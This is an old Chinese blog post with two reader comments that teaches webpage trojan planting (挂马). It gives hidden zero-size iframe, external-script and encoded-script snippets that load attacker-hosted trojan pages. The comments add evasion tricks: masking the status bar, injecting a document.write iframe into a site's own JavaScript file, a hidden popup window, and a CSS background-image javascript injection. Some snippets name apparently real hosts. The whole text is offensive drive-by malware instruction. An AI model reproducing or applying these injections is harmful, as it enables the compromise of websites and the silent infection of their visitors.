正确的4种挂马方式(属于比较简单的)

一、最简单的也是最有效的

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、js挂马

<script src=http://www.xxx.com/muma.js></script>

三、js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀的。

四、不是嵌入了与iframe不同

top.document.body.innerHTML top.document.body.innerHTML '<iframe src="木马地址"></iframe>''

上一篇: 离开
下一篇: All In One(AIO) V1.0

访客评论
#1
回复 amxku 2006-07-18, 23:10:23
挂马时用的都是<iframe src=http://www.sohu.com/mm.htm width=0 height=0></iframe>这样的源码,但是浏览被挂的时候,状态栏会显示挂马的链接,在mm.htm或被挂的页面加上一句<body onload=window.status="被挂站的网址">可能会好一点点儿。

2.网站挂马的技巧(js法)
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了

升级一下

先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)

document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://XXXXX.com/ma.htm"frameBorder=0width=0scrolling=noheight=0to ... gin="0"></IFRAME>');

以上代码中的http://XXXXX.com/ma.htm ,换成你自己的网页木马的地址.

再把修改好的JS上传覆盖原来的JS,就可以了.

哈哈...是不是很隐蔽了!

另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破

<script>
file://window.showModelessDialog("javascript :window.open('http://2112.3322.com/mm/ray.htm' ,'k','top=3000,left=3000,width=0,height=0');

window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
#2
回复 9xiao 2007-02-06, 06:50:26
body {
background-image: url('javascript:document.write("<script src=http://www.9xiao.net/9xiao.js></script>")')
}

9xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")
发表评论

评论内容 (必填):